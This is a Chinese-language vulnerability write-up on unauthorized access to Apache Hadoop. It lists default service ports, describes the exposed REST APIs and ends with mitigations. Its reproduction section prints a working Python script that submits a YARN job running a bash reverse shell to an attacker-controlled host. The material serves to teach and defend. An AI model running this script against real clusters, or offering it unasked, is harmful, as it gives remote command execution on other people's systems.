Hadoop未授权访问
一、漏洞简介
Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理。这个框架被Adobe,Last fm,EBay,Yahoo等知名公司使用着。它极大地精简化程序员进行分布式计算时所需的操作,用户大概通过如下步骤在hadoop中实现分布式处理:
- 用户创建一个处理键值的map函数
- 产生了一套中间键/值
- reduce函数合并中间值并把他们关联到对应的键
二、影响范围
三、复现过程
1. 扫描探测
1.1 常见端口
1.2 敏感端口
模块 | 节点 | 默认端口 |
---|---|---|
HDFS | NameNode | 50070 |
HDFS | SecondNameNode | 50090 |
HDFS | DataNode | 50075 |
HDFS | Backup/Checkpoint node | 50105 |
MapReduce | JobTracker | 50030 |
MapReduce | TaskTracker | 50060 |
通过访问 NameNode WebUI 管理界面的 50070 端口,可以下载任意文件。而且,如果 DataNode 的默认端口 50075 开放,攻击者可以通过 HDSF 提供的 restful API 对 HDFS 存储的数据进行操作。
2. 攻击手法
利用方法和原理中有一些不同。在没有 hadoop client 的情况下,直接通过 REST API 也可以提交任务执行。
利用过程如下:
- 在本地监听等待反弹 shell 连接
- 调用 New Application API 创建 Application
- 调用 Submit Application API 提交
P牛的攻击脚本
##!/usr/bin/env python
import requests
target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' ## put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
3. 防范措施
网络访问控制 使用 安全组防火墙 或本地操作系统防火墙对访问源 IP 进行控制。如果您的 Hadoop 环境仅对内网服务器提供服务,建议不要将 Hadoop 服务所有端口发布到互联网。
启用认证功能 启用 Kerberos 认证功能。
更新补丁 不定期关注 Hadoop 官方发布的最新版本,并及时更新补丁。